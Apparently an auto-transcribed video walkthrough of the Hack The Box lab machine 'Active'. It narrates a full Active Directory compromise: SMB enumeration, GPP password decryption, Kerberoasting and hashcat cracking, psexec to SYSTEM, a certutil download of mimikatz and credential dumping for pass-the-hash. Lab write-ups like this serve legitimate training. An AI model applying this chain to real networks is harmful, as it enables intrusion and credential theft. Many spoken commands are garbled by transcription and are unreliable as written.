In this video, I will demonstrate how to do red team operations on an Active Directory environment. So the hack the box machine which you have chosen is called Active, and it's an easy Windows machine. And let's get its IP. So I'm connected over VPN over here, and let's do an nmap scan for all the 65,535 open ports with min rate 4,000. And let's save it in a file called active.nmap. So I'm changing the name of the file to active.nmap, and everything looks fine. And let's hit enter, and we find a few ports which are open. So port 53 for DNS, port 135 for RPC, port 445 for SMB, and we find a bunch of other ports which are open. We find Kerberos 88, port 88. And let's start with the enumeration of each and every port and services. So let's do another reconnaissance on the ports. So let's do a stealth scan as well as a service and default script scan. So let's save it as active, and let's specify the IP address, and let's change the ports. So let's delete all these ports, and so basically we have to add all these ports, right? Let me copy this. So I'll tell you whatever the port is known for, whatever service the port usually runs. So these are the standard ports, and let me specify the ports. So I'm doing a stealth scan with the default script scan, default service version scan, and not default service version, just the service version scan. And let me specify port 53, 88 for Kerberos, 135 for RPC, and 139 for NetBIOS, or we also call it as Samba, and 389 for LDAP, 445 for SMB, 464 for some service, and 593 is RPC HTTP. And so these are all the non-standard ports. And so I specify all this. So the higher ports are usually for RPC, and we have to do a service as well as service version detection and panel grabbing using nmap. So this is how we specify. You do nmap dash ss for stealth scan, for dash sc for default script, dash sp for service as well as versions, dash p to specify the ports which are open, and dash triple v to do in verbose mode, dash oa to specify output in all format, which is nmap, gnmap, and other formats. And we have to specify the target. So now let's start enumerating. So we have port 53 open, right? We can do dig axfr. Let me do if config first, and let me copy my IP address. It will be specified in ton 0. Ton 0 is the has the default default IP address for the VPN endpoint, and we have to specify our IP, dig AXFR, which is a zone transfer, and our IP as well as the target IP, and the connection is refused, so there is no zone transfer possible. And let's check for the next port, which is Kerberos. We can do Kerberoasting as well as ASAP roasting for this. but for that we need users, right? So let's try to get it from RPC. Let's do RPC client dash u, and let's specify the username, and let's specify the null session, null password, and let's specify the target. So dash u is for username and dash n is for null session, and RPC client will try to get the users by enum dom users. So I think that is that command is access is denied. So we go to help and we can see all these options. So if you get RPC access, you can do query disk info or enum dom users to get the usernames of the particular machine. Now let's go to our next port. So these three ports are done, and let's do LDAP enumeration. So let's do LDAP search, tag X, tag H for the host, and LDAP, and our target IP address. So let's copy this and let's paste it, and do dash S base naming context so that we get the DC name and naming context. Sorry, yeah. So we get the DC name as active.htb, and so we can do now dash B option, dash D. I don't remember it correctly. We can look for that in dash H, and it's a little bit difficult to find it like this. And dash T is for bind domain name, and let's search that in Google. And let me search in my methodology.ctb file, and let me search for LDAP search. So Control F, LDAP search, and LDAP's command is not found. So I don't think LDAP command is found in this. Let's go to Google and search it. Let me close this and let's search it in google.com, and let's search LDAP search, and let's do hack tricks. Let's look for the site hack tricks, and you can find hack tricks in the first link, and open that and search for LDAP search command. So these are all the LDAP related commands, and let me search that. So yeah, we find it here over here. So LDAP search commands. We just need to copy that. Let me maximize this and let me search for LDAP search. Let me do Control F and search. So this is how you get the commands if you don't know anything how to run it. You can use the dash H option, or you can just go to Google and search the example commands to run. And this is the command. So the option was dash B, right? Yeah. So dash B, and then the naming context. So that DC name, DC is equal to active, and comma DC is equal to HTB. So we need to copy that naming context, and we need hit enter. So we hit enter by giving the dash B option, and We do not find any further information, so we close this and let me go to another port. And so now we are doing SMB enumeration, which is port 445. So we did LDAP, we did RPC, we did not find anything. Now let's go to SMB port and do some enumeration on that. So we can use the various tools like SMB map, crack map exec, and SMB client. So let's do cat active dot nmap, and let's try to get the particular domain name. So the domain name is active.htb. Let me search for that. And active. Let me go down and search. So it should be somewhere around here in the nmap scan. So we get the domain, which is active.htb, and we copy that and we add it to our host file. So we do sudo nano host and we type in our Kali password, and we cut this and we add active.htb. It should be HTB, and add our IP address preceding to that. Let me copy that IP address and let's paste it and let's save it. Now let's ping active.htb, and ping is successful. So now let's do crack map exec, and let me type in crack map exec and do SMB and do active.htb and give the username by specifying -u as blank and password as blank and enumerate the shares. And it's a directory, so we have to remove that directory first. So let's do ls and let's do rm minus rf active.htb. Rf is for remove recursively remove and to remove by force. And let's enumerate the shares again. So this takes a bit of time, and we got one of the share, which is replication, and we have a read access on that. So let me try to log into that. SMB client -n -l -n, and let's do forward double forward slash active.htb. So this is how you do a null authentication on using SMB client, and use forward slash, and let's hit replication, and we got anonymous login. And now let's do ls, and we have active.htb. Now what you can do is we can use these three commands to get, recursively get all the files by not providing a prompt, by answering the prompt automatically and do mget star. So we had to recurse on prompt of mget star to get all the files recursively in the SMB share. So we're getting these files. It is an ini file, and so we have group policy.gp.ini, registry.pol. So we're getting files recursively, and let's see. So there we go. We have a groups.xml file. So we need to check that out and look for any of the uh, passwords which are hard coded in that groups.xml file. And let me copy that path and let's do exit. and let's do cd that path. So we have to change the backward slash to a forward slash because this is Linux. And remove this and we're good to go. So let's do ls. We get groups.xml and let's copy that to active dot. So let me clear the screen and let me copy that to downloads slash active, and let me catch the directory of downloads slash active, and we have the groups.xml file. Let's do cat groups.xml to list the contents, and looks like we have a GPP. So a GPP password, and how we decrypt this password is so we have a username of active.htb slash svc underscore tgs, and we do a gpp hyphen decrypt on this particular password. So let's try echo and let's paste that, and let's pass it to gpp hyphen decrypt. I don't think that worked, so let's do let's remove this, and instead of echo we can do gpp hyphen decrypt. So let's do gpp hyphen decrypt, and let's provide the password as an argument, and we get the password. So gpp still standing strong. 2k18 is the password, and let's do rm minus f creds, and let's do nano creds, and let me paste that, and let's do let me save it, and now I will copy this particular svc underscore tgs, and let's do nanocreds again, and let me paste that, and let me convert this backward slash to forward slash, and let's do cat creds. So we get the credentials. So now we have our initial access by this SMB share, and now let's try to do furthermore SMB enumeration. So let's do cat creds. So let me remove that active.htb file first, and let's do crack map exec. So let's do cat creds first. So we need the credentials, and let's do crack map exec smb active.htb and provide the particular username as well as the password. So what we are doing is we are retrying SMB enumeration providing by providing the username and password. So the plus green is a indication that shares can be enumerated using the particular username and password, and we get read access to further more files, which is users, and we can check that out as well. But I would say, as we have gotten a password, we'll do an RID brute force to get other users. So RID brute force essentially does a brute force by getting the RID. So it gets that particular ID and gets the administrator user, and after that it will keep on enumerating until you get the other usernames. So we are doing that. So we got the users, we got domain users, we got domain computers, we got groups as well. We got users as well as groups. So let this finish. So let's copy this till here, and let's create nano users, a users file, and let's paste that. So let's paste that and let's save it. Control O, Control X to save and exit. And let's do cat users, and let's do grep for SID type users so that we get only the users. So we do SID and we do SID type user, and we get all the users. So let's do AWK and let's give the field separator as space, and let's print $6. So if this is the full command, I want to show you step by step how to get a particular username. So field separator of space and print $6. So it's the sixth particular column. So we get active slash all these users, and we need to do another awk-f with the field separator of backward slash and get the second column which will give our users. So if you have a large usernames, you can use this method to extract the usernames only from the particular crack map exec output. And let's save it to users.txt. Let's do cat users.txt, and so we can do now Kerberoasting as reproasting, and so in packet get np users, and so the whole command is here. So dash k for Kerberoasting and no pass to provide that password file is not required, and do request to request the tgt tickets as well as the hashes, and format hashcat, and dash users file we provide with users.txt, and we provide the dcip, and finally the domain. So let's go to dcip and let's copy our ip address. Let's paste it and let's do active.htb forward slash is important, or else the command won't run. So we're trying to get, and we do not get any as representable user. So we would do Kerberoasting on this. So we can do in packet get user SPNs. Get user SPNs is for Kerberoasting, and get NP users is for as represting. So we do dash users file, and we specify users.txt, and we give that dcip, and we copy this and we paste it. And what we do is we give active.htb HTB, or we can copy it from that creds file. Let's do cat creds, and let's copy this. Let's paste it over here, and let's hit enter. And we got the Kerberos ticket for 3 users. And what we can do is we can do cracking of this using hashcat. So let's copy this and let's save it to a file called admin hashes, right? Let's do nano admin underscore hashes, and so admin hash, and we paste this, we save it, and we do hashcat dash m, and 18,200 is the mode. Sorry, 13,100. I think it's for asterisk roasting, and I think we have chosen a wrong one. Let's try. See. So we need to specify the hash as well as the word list, which is user share word list rocky.txt, and I think we might have cracked that. Let's copy this as well, and let's create another one called KRB TGT hash. So let's paste it and let's save it, and let's do hashcat dash m to specify the mode, and we specify it as 13,100, and we give the hash as well as word list. So we give it as curve TGT hash, and the word list remains the same, user share word list rocky.txt. And I think we got the administrator password using the curve TGT, and we paste that. And so let me copy that, and we just change the username as administrator, and we save it. So we did not find a password for this curve TGT. So we just look over here and we don't find any password for curve TGT. So yeah. So now let's what we can do is we can copy this as well and try to crack the hash of this user. So the username is DC dollar. So let's create a file called nano DC hash, and let's paste it. Let's control O control X to save and exit, and let's do hashcat dash m 1300, and let's do DC hash, and let it run for a while, and let me clear the screen, and let's do cat creds to view our credentials. So we have escalated our privileges by now by doing a Kerberoasting and getting the Kerberos TGT for the administrator user. So now we can do an evil WinRM on the machine, or we can do impact at PS exec. So we can do process exec, and let's specify the particular domain slash user colon password at IP address. So that should be the format. So it's domain active.htb slash user administrator colon password, which is ticket master, and at IP address of the domain controller. And we get login as administrator. And let's do who am I. We get entity authority system. Let's me clear the screen and let's me do who am I again. And we can do system info or sysinfo. Let's do system info. And we get all the system information. We get the operating system information and OS version or manufacturer configuration. And yeah. So BIOS version, Windows directory, and some more information. We get the domain as active.htb. We get the hotfix versions. We just exit out of this. We do a keyboard interrupt, and let me do a PS exit again. So let me do a OMI. We get anti-authority system, and we do ipconfig/all to view its IP configurations, and we get the IP address. So let it run for a while. We get the subnet mask. We get the DNS servers. So yeah, let me clear screen. So now we can do is we can dump out all the hashes to maintain persistence on the network. So we can use a tool called Mimikatz. So Mimikatz essentially does is it gets the process which is system process called LSS. So it gets that LSS process and dumps out all the credentials that are all the credentials like clear text passwords and NTLM hashes, Kerberos tickets. So let me go to releases page, and I don't find any releases. Let's go to x64, and we get mimikatz.exe. So let's download this. I think it's downloaded twice. So let me remove one of them. Let me go to the folder and delete this. So we copy this particular, sorry, shouldn't have closed that browser. So let me go to hack the box again. And so now let's transfer Mimikatz from our Linux machine to the particular box. So essentially how we would transfer Mimikatz from the Linux machine to Windows machine is we can use either SMB server, or we can use a simple HTTP server to transfer. And let's do users administrator, and let's catch the directory of desktop, and let's do root.txt. And I don't think root.txt is a directory. So we go to desktop, and let's do type root.txt, and we get the root hash. So we get the flag, and we can paste this flag, and I've already submitted the machine, so it's no need of that. So now essentially what you can do is transfer Mimikatz to our box. So let me go to downloads, active, and let me copy from downloads folder the particular mimikatz.exe file, and let me copy that to my current directory, and let's do an ls, or let's disable our firewall first. So this is not recommended, but if you're playing a CTF, that's fine, I guess. We'll only disable it for some time. Let's do python 3-m http server 80. And let's do cert util dash url cache dash f dash split and the IP address http colon double slash our IP address, which is turn 0 IP address. Let's do if config. Let's do if config and let me copy this particular IP address and let's start the server again and let me paste it colon 80 to specify the port and slash mimikatz.exe and let's hit enter. So we would have to wait for some time because the exe file is a little bit, the connection is a little bit slow. So we got a get request and the file is getting transferred. So how this works is it sets up a HTTP server at port 80 like you're running a web server and you can download all these files. So let me show that. So you can download all the files in the current directory. So this is a list of files and directories in the current directory and it sets up a server and the transfer is complete. So now let's run mimikatz.exe to dump all the clear text password, NTLM hashes, and Kerberoast tickets. So we have to do a privilege debug and secure LSA double colon password. So we have to do privilege double colon debug as well as secure LSA double colon logon passwords. So let me stop the server and let me enable my firewall again. And now we have this Mimikatz running. So as I suggested, we have to do secure LSA double colon LSA and sorry, we have to do privilege double colon debug as well as secure LSA double colon logon passwords. And we start this particular dumping of all the credentials in the Windows box. So this is a privilege. This is a persistence technique where if we find the Kerberos golden ticket, we can have privileges of an domain admin and it'll be undetectable. So we get the NTLM hashes, we get clear text password if any, so that we can do lateral movement as well by using pass the hash techniques. So pass the hash technique is just passing on the hash instead of NTLM hash instead of the clear text password and gaining access to the system. So let it run for a while. So we have completed the machine. If you want to skip ahead, you can do it. So let's do methodology.txt. And our methodology.txt, we have done reconnaissance. So in the reconnaissance phase, we did an nmap scan, right? So port scanning using nmap and so port scanning on all 65,535 ports and found specifically 445 port, which was interesting, and did SMB enumeration. And after we did an SMB enumeration, we found a groups.xml file. So readable share. So first we found a readable share and found groups.xml file credentials. So we found credentials in groups.xml file and performed gpp-decrypt to get the clear text password. And then we did further enumeration. So for the further enumeration, we did crack map execs RID brute force to get the usernames. So the initial access is when we got the clear text password and we were able to access the user share. And yeah, so let me copy that. So we did RID brute forcing, and after that we did Kerberoasting, right? We found more usernames, and for the privilege privesc or privilege escalation, we performed Kerberoasting. So we performed Kerberoasting and found the administrator hash, NTLM hash, or the Kerberos tickets. So using impacted get user SPNs, we did a Kerberoasting and got the Kerberos TGT and cracked it offline using hashcat. So we cracked the password using hashcat and got the administrator credentials. So got the administrative access using impacket psexec. And we are maintaining persistence using mimikatz. Right, we get all the NTLM hashes of other users. You get the NTLM hash of the particular administrator, and we can do pass the hash techniques and mimikatz to temp all the clear text passwords and Kerberos TGT and tell them hashes. So NTLM hash and Kerberos TGT. So we have dumped a lot of NTLM hashes as well as credentials. So this is another pass. We have dumped passwords as well in hex format. So this is hex format password. This is the NTLM hash, and this is the SHA-1 hash. And we can do a lateral movement to DC user. We can do a lateral movement to administrator user using the NTLM hash and pass the hash techniques. So we let Mimikatz run for a while and get all the NTLM hashes. So thank you for watching till now. Do check out my red team operations video in my channel. I just click my channel and subscribe to this video. And thanks for watching till now.